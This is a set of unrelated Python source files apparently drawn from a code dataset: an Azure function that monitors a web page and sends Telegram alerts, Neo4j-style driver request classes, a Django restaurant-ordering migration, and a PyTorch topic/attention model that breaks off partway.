"step-3": "<mask token>\n\n\ndef hash_string(input_string: str) ->str:\n return hashlib.sha256(input_string.encode('utf-8')).hexdigest()\n\n\ndef main(mytimer: func.TimerRequest) ->None:\n utc_timestamp = datetime.datetime.utcnow().replace(tzinfo=datetime.\n timezone.utc).isoformat()\n if mytimer.past_due:\n logging.info('The timer is past due!')\n logging.info('Python timer trigger function ran at %s', utc_timestamp)\n url = os.environ['TargetUrl']\n search_term = os.environ['SearchTerm']\n reqs = requests.get(url)\n soup = BeautifulSoup(reqs.text, 'html.parser')\n token = telebot.TeleBot(os.environ['TelebotToken'])\n chat_id = os.environ['TelebotChatId']\n urls = []\n for link in soup.find_all('a'):\n link_url = link.get('href')\n if search_term in link_url:\n urls.append(link_url)\n logging.info(f'Looking for: {search_term}')\n logging.info(f'Urls conatining the pattern: {urls}')\n lst_to_str = ';'.join([str(i) for i in urls])\n new_hash = hash_string(lst_to_str)\n now = datetime.datetime.now()\n file_suffix = now.strftime('%Y%m%d%I%M%S')\n year = now.year\n month = now.month\n day = now.day\n blob = BlobClient.from_connection_string(conn_str=os.environ[\n 'AzureWebJobsStorage'], container_name='hashstore', blob_name=\n f'urls/{year}/{month}/{day}/html-{file_suffix}.html')\n blob.upload_blob(lst_to_str, blob_type='BlockBlob')\n logging.info(new_hash)\n blob = BlobClient.from_connection_string(conn_str=os.environ[\n 'AzureWebJobsStorage'], container_name='hashstore', blob_name=\n 'hash.tmp')\n blob_hash = ''\n if blob.exists():\n blob_hash = str(blob.download_blob().readall())\n if blob_hash != new_hash:\n message = f'Hash of this page: {url} has changed'\n bot = telebot.TeleBot(token)\n bot.config['api_key'] = token\n bot.send_message(chat_id, message)\n blob.delete_blob()\n blob.upload_blob(new_hash, blob_type='BlockBlob')\n logging.info(f'Old hash >>>> {blob_hash}')\n logging.info(f'New hash >>>> {new_hash}')\n",
"step-4": "import datetime\nimport logging\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nimport telebot\nfrom azure.storage.blob import BlobClient\nimport hashlib\nimport azure.functions as func\n\n\ndef hash_string(input_string: str) ->str:\n return hashlib.sha256(input_string.encode('utf-8')).hexdigest()\n\n\ndef main(mytimer: func.TimerRequest) ->None:\n utc_timestamp = datetime.datetime.utcnow().replace(tzinfo=datetime.\n timezone.utc).isoformat()\n if mytimer.past_due:\n logging.info('The timer is past due!')\n logging.info('Python timer trigger function ran at %s', utc_timestamp)\n url = os.environ['TargetUrl']\n search_term = os.environ['SearchTerm']\n reqs = requests.get(url)\n soup = BeautifulSoup(reqs.text, 'html.parser')\n token = telebot.TeleBot(os.environ['TelebotToken'])\n chat_id = os.environ['TelebotChatId']\n urls = []\n for link in soup.find_all('a'):\n link_url = link.get('href')\n if search_term in link_url:\n urls.append(link_url)\n logging.info(f'Looking for: {search_term}')\n logging.info(f'Urls conatining the pattern: {urls}')\n lst_to_str = ';'.join([str(i) for i in urls])\n new_hash = hash_string(lst_to_str)\n now = datetime.datetime.now()\n file_suffix = now.strftime('%Y%m%d%I%M%S')\n year = now.year\n month = now.month\n day = now.day\n blob = BlobClient.from_connection_string(conn_str=os.environ[\n 'AzureWebJobsStorage'], container_name='hashstore', blob_name=\n f'urls/{year}/{month}/{day}/html-{file_suffix}.html')\n blob.upload_blob(lst_to_str, blob_type='BlockBlob')\n logging.info(new_hash)\n blob = BlobClient.from_connection_string(conn_str=os.environ[\n 'AzureWebJobsStorage'], container_name='hashstore', blob_name=\n 'hash.tmp')\n blob_hash = ''\n if blob.exists():\n blob_hash = str(blob.download_blob().readall())\n if blob_hash != new_hash:\n message = f'Hash of this page: {url} has changed'\n bot = telebot.TeleBot(token)\n bot.config['api_key'] = token\n bot.send_message(chat_id, message)\n blob.delete_blob()\n blob.upload_blob(new_hash, blob_type='BlockBlob')\n logging.info(f'Old hash >>>> {blob_hash}')\n logging.info(f'New hash >>>> {new_hash}')\n",
"step-5": "import datetime\r\nimport logging\r\nimport os\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport telebot\r\nfrom azure.storage.blob import BlobClient\r\nimport hashlib\r\n\r\nimport azure.functions as func\r\n\r\n\r\ndef hash_string(input_string: str) -> str:\r\n return hashlib.sha256(input_string.encode(\"utf-8\")).hexdigest()\r\n\r\n\r\ndef main(mytimer: func.TimerRequest) -> None:\r\n utc_timestamp = datetime.datetime.utcnow().replace(\r\n tzinfo=datetime.timezone.utc).isoformat()\r\n\r\n if mytimer.past_due:\r\n logging.info('The timer is past due!')\r\n\r\n logging.info('Python timer trigger function ran at %s', utc_timestamp)\r\n\r\n url = os.environ['TargetUrl']\r\n search_term = os.environ['SearchTerm']\r\n reqs = requests.get(url)\r\n soup = BeautifulSoup(reqs.text, 'html.parser')\r\n token = telebot.TeleBot(os.environ['TelebotToken'])\r\n chat_id = os.environ['TelebotChatId']\r\n\r\n urls = []\r\n for link in soup.find_all('a'):\r\n link_url = link.get('href')\r\n # Add only links that contain the search term\r\n if search_term in link_url:\r\n urls.append(link_url)\r\n\r\n logging.info(f\"Looking for: {search_term}\")\r\n logging.info(f\"Urls conatining the pattern: {urls}\")\r\n\r\n lst_to_str = ';'.join([str(i) for i in urls])\r\n new_hash = hash_string(lst_to_str)\r\n now = datetime.datetime.now()\r\n file_suffix = now.strftime(\"%Y%m%d%I%M%S\")\r\n year = now.year\r\n month = now.month\r\n day = now.day\r\n\r\n blob = BlobClient.from_connection_string(\r\n conn_str=os.environ['AzureWebJobsStorage'], container_name=\"hashstore\", blob_name=f'urls/{year}/{month}/{day}/html-{file_suffix}.html')\r\n blob.upload_blob(lst_to_str, blob_type='BlockBlob')\r\n\r\n logging.info(new_hash)\r\n\r\n blob = BlobClient.from_connection_string(\r\n conn_str=os.environ['AzureWebJobsStorage'], container_name=\"hashstore\", blob_name='hash.tmp')\r\n blob_hash = ''\r\n if blob.exists():\r\n blob_hash = str(blob.download_blob().readall())\r\n if blob_hash != new_hash:\r\n message = f'Hash of this page: {url} has changed'\r\n bot = telebot.TeleBot(token)\r\n bot.config['api_key'] = token\r\n bot.send_message(chat_id, message)\r\n blob.delete_blob()\r\n\r\n blob.upload_blob(new_hash, blob_type='BlockBlob')\r\n\r\n logging.info(f'Old hash >>>> {blob_hash}')\r\n logging.info(f'New hash >>>> {new_hash}')\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
All requests will be sent to backend as:
{
name: <class name>,
data: {
<all instance variables>
}
}
"""
class NewDriver:
def __init__(self, uri, authToken):
self.uri = uri
self.authorizationToken = authToken
class DriverClose:
def __init__(self, driverId):
self.driverId = driverId
class NewSession:
def __init__(self, driverId, accessMode, bookmarks):
self.driverId = driverId
self.accessMode = accessMode
self.bookmarks = bookmarks
class SessionClose:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Response should be Result model or raised Error model
"""
class SessionRun:
def __init__(self, sessionId, cypher, params):
self.sessionId = sessionId
self.cypher = cypher
self.params = params
class SessionReadTransaction:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Indicates a positive intent from the client application to commit the retryable transaction
"""
class RetryablePositive:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Indicates a negative intent from the client application to commit the retryable transaction
"""
class RetryableNegative:
def __init__(self, sessionId, errorId=""):
self.sessionId = sessionId
self.errorId = errorId
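# Illustrative sketch (assumption, not part of the original file): signalling the outcome
# of a retryable transaction, as described in the docstrings above. `send_request` is an
# assumed transport callable provided by the surrounding harness, and `error_id` would
# come from a previously reported error response.
def finish_retryable(session_id, send_request, failed=False, error_id=""):
    if failed:
        send_request(RetryableNegative(session_id, errorId=error_id))
    else:
        send_request(RetryablePositive(session_id))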
class TransactionRun:
def __init__(self, txId, cypher, params):
self.txId = txId
self.cypher = cypher
self.params = params
"""
Response should be a Record model, a NullRecord to indicate the last record, or a raised Error model
if the record couldn't be retrieved.
"""
class ResultNext:
def __init__(self, resultId):
self.resultId = resultId
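# Illustrative sketch (assumption, not part of the original file): draining a result
# stream by sending ResultNext until the backend answers with a null record, as the
# docstring above describes. `send_request` and `is_null_record` are assumed callables
# supplied by the surrounding harness.
def drain_result(result_id, send_request, is_null_record):
    records = []
    while True:
        response = send_request(ResultNext(result_id))
        if is_null_record(response):
            return records
        records.append(response)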
class AuthorizationToken:
def __init__(self, scheme="none", principal="", credentials="", realm="", ticket=""):
self.scheme=scheme
self.principal=principal
self.credentials=credentials
self.realm=realm
self.ticket=ticket
|
normal
|
{
"blob_id": "dfcb095b26a21ba0c8ccc2a2c664bcfab29b8351",
"index": 8214,
"step-1": "<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-2": "<mask token>\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-3": "<mask token>\n\n\nclass NewSession:\n <mask token>\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-4": "<mask token>\n\n\nclass DriverClose:\n <mask token>\n\n\nclass NewSession:\n\n def __init__(self, driverId, accessMode, bookmarks):\n self.driverId = driverId\n self.accessMode = accessMode\n self.bookmarks = bookmarks\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-5": "\n\"\"\"\nAll requests will be sent to backend as:\n {\n name: <class name>,\n data: {\n <all instance variables>\n }\n }\n\"\"\"\n\nclass NewDriver:\n def __init__(self, uri, authToken):\n self.uri = uri\n self.authorizationToken = authToken\n\n\nclass DriverClose:\n def __init__(self, driverId):\n self.driverId = driverId\n\n\nclass NewSession:\n def __init__(self, driverId, accessMode, bookmarks):\n self.driverId = driverId\n self.accessMode = accessMode\n self.bookmarks = bookmarks\n\n\nclass SessionClose:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nResponse should be Result model or raised Error model\n\"\"\"\nclass SessionRun:\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nIndicates a positive intent from the client application to commit the retryable transaction\n\"\"\"\nclass RetryablePositive:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nIndicates a negative intent from the client application to commit the retryable transaction\n\"\"\"\nclass RetryableNegative:\n def __init__(self, sessionId, errorId=\"\"):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n\"\"\"\nResponse should be Record model, NullRecord to indicate last record or raised Error model if record\ncouldn't be retrieved.\n\"\"\"\nclass ResultNext:\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n def __init__(self, scheme=\"none\", principal=\"\", credentials=\"\", realm=\"\", ticket=\"\"):\n self.scheme=scheme\n self.principal=principal\n self.credentials=credentials\n self.realm=realm\n self.ticket=ticket\n\n",
"step-ids": [
14,
16,
17,
19,
23
]
}
|
[
14,
16,
17,
19,
23
] |
from adb_local_installer.connection import ADBConnection
with ADBConnection("a95x01", domain="dohmens.local") as conn:
print(conn.conn)
|
normal
|
{
"blob_id": "6f583fde0eeab84984629b795e428300503a49c9",
"index": 9852,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith ADBConnection('a95x01', domain='dohmens.local') as conn:\n print(conn.conn)\n",
"step-3": "from adb_local_installer.connection import ADBConnection\nwith ADBConnection('a95x01', domain='dohmens.local') as conn:\n print(conn.conn)\n",
"step-4": "from adb_local_installer.connection import ADBConnection\n\n\nwith ADBConnection(\"a95x01\", domain=\"dohmens.local\") as conn:\n print(conn.conn)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 2.1.5 on 2019-01-21 22:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('phone_number', models.CharField(max_length=232, primary_key=True, serialize=False)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='customer', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Dish',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=232)),
('category', models.CharField(max_length=232)),
('picture', models.ImageField(upload_to='uploads/')),
('description', models.TextField(null=True)),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
],
),
migrations.CreateModel(
name='DishCount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('count', models.IntegerField(default=1)),
('dish', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Dish')),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('meal_date_time', models.DateTimeField()),
('comment', models.TextField(max_length=232, null=True)),
('person_count', models.IntegerField(default=1)),
('status', models.IntegerField(choices=[('NEW', 1), ('IN PROGRESS', 2), ('READY TO MEAL', 3), ('FINISHED', 4)], default=1)),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='main.Customer')),
('dishes', models.ManyToManyField(through='main.DishCount', to='main.Dish')),
],
),
migrations.CreateModel(
name='Restaurant',
fields=[
('name', models.CharField(max_length=232)),
('description', models.TextField(max_length=232)),
('picture', models.ImageField(upload_to='uploads/')),
('phone_number', models.CharField(max_length=232, primary_key=True, serialize=False)),
('coord_x', models.DecimalField(decimal_places=10, max_digits=40)),
('coord_y', models.DecimalField(decimal_places=10, max_digits=40)),
('dishes', models.ManyToManyField(to='main.Dish')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='order',
name='restaurant',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='main.Restaurant'),
),
migrations.AddField(
model_name='dishcount',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Order'),
),
]
|
normal
|
{
"blob_id": "a6cb7a134fb8480d344743bcb7bc8766146d256f",
"index": 8238,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [migrations.CreateModel(name='Customer', fields=[(\n 'phone_number', models.CharField(max_length=232, primary_key=True,\n serialize=False)), ('user', models.OneToOneField(on_delete=django.\n db.models.deletion.CASCADE, related_name='customer', to=settings.\n AUTH_USER_MODEL))]), migrations.CreateModel(name='Dish', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID')), ('name', models.CharField(\n max_length=232)), ('category', models.CharField(max_length=232)), (\n 'picture', models.ImageField(upload_to='uploads/')), ('description',\n models.TextField(null=True)), ('price', models.DecimalField(\n decimal_places=2, max_digits=10))]), migrations.CreateModel(name=\n 'DishCount', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('count',\n models.IntegerField(default=1)), ('dish', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='main.Dish'))]),\n migrations.CreateModel(name='Order', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('meal_date_time', models.DateTimeField()), (\n 'comment', models.TextField(max_length=232, null=True)), (\n 'person_count', models.IntegerField(default=1)), ('status', models.\n IntegerField(choices=[('NEW', 1), ('IN PROGRESS', 2), (\n 'READY TO MEAL', 3), ('FINISHED', 4)], default=1)), ('customer',\n models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING,\n to='main.Customer')), ('dishes', models.ManyToManyField(through=\n 'main.DishCount', to='main.Dish'))]), migrations.CreateModel(name=\n 'Restaurant', fields=[('name', models.CharField(max_length=232)), (\n 'description', models.TextField(max_length=232)), ('picture',\n models.ImageField(upload_to='uploads/')), ('phone_number', models.\n CharField(max_length=232, primary_key=True, serialize=False)), (\n 'coord_x', models.DecimalField(decimal_places=10, max_digits=40)),\n ('coord_y', models.DecimalField(decimal_places=10, max_digits=40)),\n ('dishes', models.ManyToManyField(to='main.Dish')), ('user', models\n .OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))]), migrations.AddField(model_name=\n 'order', name='restaurant', field=models.ForeignKey(on_delete=\n django.db.models.deletion.DO_NOTHING, to='main.Restaurant')),\n migrations.AddField(model_name='dishcount', name='order', field=\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'main.Order'))]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]\n operations = [migrations.CreateModel(name='Customer', fields=[(\n 'phone_number', models.CharField(max_length=232, primary_key=True,\n serialize=False)), ('user', models.OneToOneField(on_delete=django.\n db.models.deletion.CASCADE, related_name='customer', to=settings.\n AUTH_USER_MODEL))]), migrations.CreateModel(name='Dish', fields=[(\n 'id', models.AutoField(auto_created=True, primary_key=True,\n serialize=False, verbose_name='ID')), ('name', models.CharField(\n max_length=232)), ('category', models.CharField(max_length=232)), (\n 'picture', models.ImageField(upload_to='uploads/')), ('description',\n models.TextField(null=True)), ('price', models.DecimalField(\n decimal_places=2, max_digits=10))]), migrations.CreateModel(name=\n 'DishCount', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('count',\n models.IntegerField(default=1)), ('dish', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, to='main.Dish'))]),\n migrations.CreateModel(name='Order', fields=[('id', models.\n AutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('meal_date_time', models.DateTimeField()), (\n 'comment', models.TextField(max_length=232, null=True)), (\n 'person_count', models.IntegerField(default=1)), ('status', models.\n IntegerField(choices=[('NEW', 1), ('IN PROGRESS', 2), (\n 'READY TO MEAL', 3), ('FINISHED', 4)], default=1)), ('customer',\n models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING,\n to='main.Customer')), ('dishes', models.ManyToManyField(through=\n 'main.DishCount', to='main.Dish'))]), migrations.CreateModel(name=\n 'Restaurant', fields=[('name', models.CharField(max_length=232)), (\n 'description', models.TextField(max_length=232)), ('picture',\n models.ImageField(upload_to='uploads/')), ('phone_number', models.\n CharField(max_length=232, primary_key=True, serialize=False)), (\n 'coord_x', models.DecimalField(decimal_places=10, max_digits=40)),\n ('coord_y', models.DecimalField(decimal_places=10, max_digits=40)),\n ('dishes', models.ManyToManyField(to='main.Dish')), ('user', models\n .OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL))]), migrations.AddField(model_name=\n 'order', name='restaurant', field=models.ForeignKey(on_delete=\n django.db.models.deletion.DO_NOTHING, to='main.Restaurant')),\n migrations.AddField(model_name='dishcount', name='order', field=\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n 'main.Order'))]\n",
"step-5": "# Generated by Django 2.1.5 on 2019-01-21 22:51\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Customer',\n fields=[\n ('phone_number', models.CharField(max_length=232, primary_key=True, serialize=False)),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='customer', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Dish',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=232)),\n ('category', models.CharField(max_length=232)),\n ('picture', models.ImageField(upload_to='uploads/')),\n ('description', models.TextField(null=True)),\n ('price', models.DecimalField(decimal_places=2, max_digits=10)),\n ],\n ),\n migrations.CreateModel(\n name='DishCount',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('count', models.IntegerField(default=1)),\n ('dish', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Dish')),\n ],\n ),\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('meal_date_time', models.DateTimeField()),\n ('comment', models.TextField(max_length=232, null=True)),\n ('person_count', models.IntegerField(default=1)),\n ('status', models.IntegerField(choices=[('NEW', 1), ('IN PROGRESS', 2), ('READY TO MEAL', 3), ('FINISHED', 4)], default=1)),\n ('customer', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='main.Customer')),\n ('dishes', models.ManyToManyField(through='main.DishCount', to='main.Dish')),\n ],\n ),\n migrations.CreateModel(\n name='Restaurant',\n fields=[\n ('name', models.CharField(max_length=232)),\n ('description', models.TextField(max_length=232)),\n ('picture', models.ImageField(upload_to='uploads/')),\n ('phone_number', models.CharField(max_length=232, primary_key=True, serialize=False)),\n ('coord_x', models.DecimalField(decimal_places=10, max_digits=40)),\n ('coord_y', models.DecimalField(decimal_places=10, max_digits=40)),\n ('dishes', models.ManyToManyField(to='main.Dish')),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.AddField(\n model_name='order',\n name='restaurant',\n field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='main.Restaurant'),\n ),\n migrations.AddField(\n model_name='dishcount',\n name='order',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Order'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import torch
from torch import nn
import torch.nn.functional as F
class JointModel(nn.Module):
def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,encoder_shortcut, generator_shortcut, generator_transform,
num_word, emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout, word_rnn_bidirectional,word_attention_size,
context_rnn_size, context_rnn_num_layer, context_rnn_dropout, context_rnn_bidirectional,context_attention_size, mlp_size,
num_label, pretrained_embedding):
super(JointModel, self).__init__()
##NGTM:
self.d_v = d_v # vocabulary size
self.d_e = d_e # dimensionality of encoder
self.d_t = d_t # number of topics
self.encoder_layers = encoder_layers
self.generator_layers = generator_layers
self.generator_transform = generator_transform # transform to apply after the generator
self.encoder_shortcut = encoder_shortcut
self.generator_shortcut = generator_shortcut
self.en1_fc = nn.Linear(self.d_v, self.d_e)
self.en2_fc = nn.Linear(self.d_e, self.d_e)
self.en_drop = nn.Dropout(0.2)
self.mean_fc = nn.Linear(self.d_e, self.d_t)
# self.mean_bn = nn.BatchNorm1d(self.d_t)
self.logvar_fc = nn.Linear(self.d_e, self.d_t)
# self.logvar_bn = nn.BatchNorm1d(self.d_t)
self.generator1 = nn.Linear(self.d_t, self.d_t)
self.generator2 = nn.Linear(self.d_t, self.d_t)
self.generator3 = nn.Linear(self.d_t, self.d_t)
self.generator4 = nn.Linear(self.d_t, self.d_t)
self.r_drop = nn.Dropout(0.2)
self.de = nn.Linear(self.d_t, self.d_v)
# self.de_bn = nn.BatchNorm1d(self.d_v)
##HAN:
self.emb_size = emb_size
self.word_rnn_size = word_rnn_size
self.word_rnn_num_layer = word_rnn_num_layer
self.word_rnn_bidirectional = word_rnn_bidirectional
self.context_rnn_size = context_rnn_size
self.context_rnn_num_layer = context_rnn_num_layer
self.context_rnn_bidirectional = context_rnn_bidirectional
self.num_label = num_label
self.embedding = nn.Embedding(num_word, emb_size)
self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=word_rnn_size, dropout=word_rnn_dropout,
num_layers=word_rnn_num_layer, bidirectional=word_rnn_bidirectional)
word_rnn_output_size = word_rnn_size * 2 if word_rnn_bidirectional else word_rnn_size
self.word_conv_attention_linear = nn.Linear(word_rnn_output_size, self.d_t, bias=False)
self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)
self.context_rnn = nn.GRU(input_size=word_rnn_output_size, hidden_size=context_rnn_size,dropout=context_rnn_dropout,
num_layers=context_rnn_num_layer, bidirectional=context_rnn_bidirectional)
context_rnn_output_size = context_rnn_size * 2 if context_rnn_bidirectional else context_rnn_size
self.context_conv_attention_linear = nn.Linear(context_rnn_output_size, 1, bias=False)
self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size, mlp_size),
nn.LeakyReLU(),
nn.Linear(mlp_size, num_label),
nn.Tanh())
if pretrained_embedding is not None:
self.embedding.weight.data = self.embedding.weight.data.new(pretrained_embedding)
def encoder(self, x):
if self.encoder_layers == 1:
pi = F.relu(self.en1_fc(x))
if self.encoder_shortcut:
pi = self.en_drop(pi)
else:
pi = F.relu(self.en1_fc(x))
pi = F.relu(self.en2_fc(pi))
if self.encoder_shortcut:
pi = self.en_drop(pi)
# mean = self.mean_bn(self.mean_fc(pi))
# logvar = self.logvar_bn(self.logvar_fc(pi))
mean = self.mean_fc(pi)
logvar = self.logvar_fc(pi)
return mean, logvar
def sampler(self, mean, logvar, cuda):
eps = torch.randn(mean.size()).cuda(cuda)
sigma = torch.exp(logvar)
h = sigma.mul(eps).add_(mean)
return h
def generator(self, h):
# temp = self.generator1(h)
# if self.generator_shortcut:
# r = F.tanh(temp) + h
# else:
# r = temp
if self.generator_layers == 0:
r = h
elif self.generator_layers == 1:
temp = self.generator1(h)
if self.generator_shortcut:
r = F.tanh(temp) + h
else:
r = temp
elif self.generator_layers == 2:
temp = F.tanh(self.generator1(h))
temp2 = self.generator2(temp)
if self.generator_shortcut:
